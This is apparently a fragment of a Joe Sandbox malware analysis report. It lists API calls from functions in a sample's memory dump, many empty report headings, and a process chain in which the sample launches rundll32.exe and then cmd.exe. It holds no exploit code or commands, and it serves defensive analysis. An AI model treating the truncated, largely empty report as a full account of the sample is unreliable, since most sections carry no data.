Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 013032F6, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26

APIs

GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,-00000002,?,0130345D), ref: 01303310
GetProcAddress.KERNEL32(00000000,?,0130345D), ref: 01303317

Strings

LocalAlloc, xrefs: 01303306
kernel32, xrefs: 0130330B

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01301F96, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25

APIs

GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,0000000100000013,01301A2E), ref: 01301FB1
GetProcAddress.KERNEL32(00000000), ref: 01301FB8

Strings

LocalAlloc, xrefs: 01301FA7
kernel32, xrefs: 01301FAC

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01304D67, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16

APIs

GetModuleHandleW.KERNEL32(mscoree.dll,?,01304D9F,?,?,0130789B,000000FF,0000001E,00000001,00000000,00000000,?,01306225,?,00000001,?), ref: 01304D71
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,01304D9F,?,?,0130789B,000000FF,0000001E,00000001,00000000,00000000,?,01306225,?,00000001), ref: 01304D81

Strings

CorExitProcess, xrefs: 01304D7B
mscoree.dll, xrefs: 01304D6C

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01303F3A, Relevance: 6.2, APIs: 4, Instructions: 159

APIs

Part of subcall function 01303EBE: GetOEMCP.KERNEL32(00000000), ref: 01303EE7
Part of subcall function 01303EBE: GetACP.KERNEL32(00000000), ref: 01303F0A

IsValidCodePage.KERNEL32(-00000030), ref: 01303FAD
GetCPInfo.KERNEL32(00000000,?), ref: 01303FC0
setSBUpLow.LIBCMT ref: 013040AE

Part of subcall function 01303C8A: GetCPInfo.KERNEL32(?,?), ref: 01303CAB
Part of subcall function 01303C8A: ___crtGetStringTypeA.LIBCMT ref: 01303D28
Part of subcall function 01303C8A: ___crtLCMapStringA.LIBCMT ref: 01303D48
Part of subcall function 01303C8A: ___crtLCMapStringA.LIBCMT ref: 01303D6D

setSBCS.LIBCMT ref: 01303F67

Part of subcall function 0130601E: IsDebuggerPresent.KERNEL32 ref: 013079E7
Part of subcall function 0130601E: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 013079FC
Part of subcall function 0130601E: UnhandledExceptionFilter.KERNEL32(013098DC), ref: 01307A07
Part of subcall function 0130601E: GetCurrentProcess.KERNEL32(C0000409), ref: 01307A23
Part of subcall function 0130601E: TerminateProcess.KERNEL32(00000000), ref: 01307A2A

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 0130465A, Relevance: 6.0, APIs: 4, Instructions: 50

APIs

DecodePointer.KERNEL32(00000003,01304A83,?,01303B0C,01309D28,00000014), ref: 0130466B
TlsFree.KERNEL32(00000007,01304A83,?,01303B0C,01309D28,00000014), ref: 01304685
DeleteCriticalSection.KERNEL32(00000000,00000000,773EA0FD,?,01304A83,?,01303B0C,01309D28,00000014), ref: 01306094

Part of subcall function 013061DA: HeapFree.KERNEL32(00000000,00000000), ref: 013061F0
Part of subcall function 013061DA: GetLastError.KERNEL32(00000000,?,013047B5,00000000,?,?,013047CC,?,01303806,?,?,01303889), ref: 01306202

DeleteCriticalSection.KERNEL32(00000007,773EA0FD,?,01304A83,?,01303B0C,01309D28,00000014), ref: 013060BE

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01303E1A, Relevance: 6.0, APIs: 4, Instructions: 47

APIs

__getptd.LIBCMT ref: 01303E26

Part of subcall function 013047C4: __amsg_exit.LIBCMT ref: 013047D4

__amsg_exit.LIBCMT ref: 01303E46

Part of subcall function 013061A7: __amsg_exit.LIBCMT ref: 013061C9
Part of subcall function 013061A7: EnterCriticalSection.KERNEL32(?,?,?,013046E1,0000000D), ref: 013061D1

InterlockedDecrement.KERNEL32(?), ref: 01303E73

Part of subcall function 013061DA: HeapFree.KERNEL32(00000000,00000000), ref: 013061F0
Part of subcall function 013061DA: GetLastError.KERNEL32(00000000,?,013047B5,00000000,?,?,013047CC,?,01303806,?,?,01303889), ref: 01306202

InterlockedIncrement.KERNEL32(001E11F8), ref: 01303E9E

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 0130474B, Relevance: 6.0, APIs: 4, Instructions: 45

APIs

GetLastError.KERNEL32(?,?,013047CC,?,01303806,?,?,01303889,?,?,?), ref: 0130474F

Part of subcall function 01304626: TlsGetValue.KERNEL32(?,01304762,?,?,013047CC,?,01303806,?,?,01303889,?,?,?), ref: 0130462F
Part of subcall function 01304626: DecodePointer.KERNEL32(?,?,013047CC,?,01303806,?,?,01303889,?,?,?), ref: 01304641
Part of subcall function 01304626: TlsSetValue.KERNEL32(00000000,?,?,013047CC,?,01303806,?,?,01303889,?,?,?), ref: 01304650

SetLastError.KERNEL32(00000000,?,?,013047CC,?,01303806,?,?,01303889,?,?,?), ref: 013047B9

Part of subcall function 01306259: Sleep.KERNEL32(00000000,01303889,?,?,?), ref: 01306281

DecodePointer.KERNEL32(00000000,?,?,013047CC,?,01303806,?,?,01303889,?,?,?), ref: 0130478B
GetCurrentThreadId.KERNEL32(?,?,013047CC,?,01303806,?,?,01303889,?,?,?), ref: 013047A1

Part of subcall function 013061DA: HeapFree.KERNEL32(00000000,00000000), ref: 013061F0
Part of subcall function 013061DA: GetLastError.KERNEL32(00000000,?,013047B5,00000000,?,?,013047CC,?,01303806,?,?,01303889), ref: 01306202

Part of subcall function 01304697: GetModuleHandleW.KERNEL32(KERNEL32.DLL,01309DA8,00000008,0130479F,00000000,00000000,?,?,013047CC,?,01303806,?,?,01303889,?,?), ref: 013046A8
Part of subcall function 01304697: InterlockedIncrement.KERNEL32(0130B008), ref: 013046E9

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Function 01304697, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,01309DA8,00000008,0130479F,00000000,00000000,?,?,013047CC,?,01303806,?,?,01303889,?,?), ref: 013046A8

Part of subcall function 013061A7: __amsg_exit.LIBCMT ref: 013061C9
Part of subcall function 013061A7: EnterCriticalSection.KERNEL32(?,?,?,013046E1,0000000D), ref: 013061D1

InterlockedIncrement.KERNEL32(0130B008), ref: 013046E9

Part of subcall function 013042DB: InterlockedIncrement.KERNEL32(?), ref: 013042ED
Part of subcall function 013042DB: InterlockedIncrement.KERNEL32(?), ref: 013042FA
Part of subcall function 013042DB: InterlockedIncrement.KERNEL32(?), ref: 01304307
Part of subcall function 013042DB: InterlockedIncrement.KERNEL32(?), ref: 01304314
Part of subcall function 013042DB: InterlockedIncrement.KERNEL32(?), ref: 01304321
Part of subcall function 013042DB: InterlockedIncrement.KERNEL32(?), ref: 0130433D
Part of subcall function 013042DB: InterlockedIncrement.KERNEL32(00000000), ref: 0130434D
Part of subcall function 013042DB: InterlockedIncrement.KERNEL32(?), ref: 01304363

Strings

KERNEL32.DLL, xrefs: 013046A3

Memory Dump Source

Source File: 0000000A.00000002.400069399.01301000.00000020.sdmp, Offset: 01300000, based on PE: true

Associated: 0000000A.00000002.400063479.01300000.00000002.sdmp
Associated: 0000000A.00000002.400075050.01308000.00000002.sdmp
Associated: 0000000A.00000002.400081495.0130B000.00000004.sdmp
Associated: 0000000A.00000002.400088639.0130D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1300000_9706.jbxd

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

Cryptography:

Spam, unwanted Advertisements and Ransom Demands:

Exploits:

Networking:

Boot Survival:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Domains

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Screenshot

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: i0YxTJ2SO.exe PID: 3432 Parent PID: 3020

General

Analysis Process: rundll32.exe PID: 3464 Parent PID: 3432

General

Analysis Process: cmd.exe PID: 3476 Parent PID: 3464

General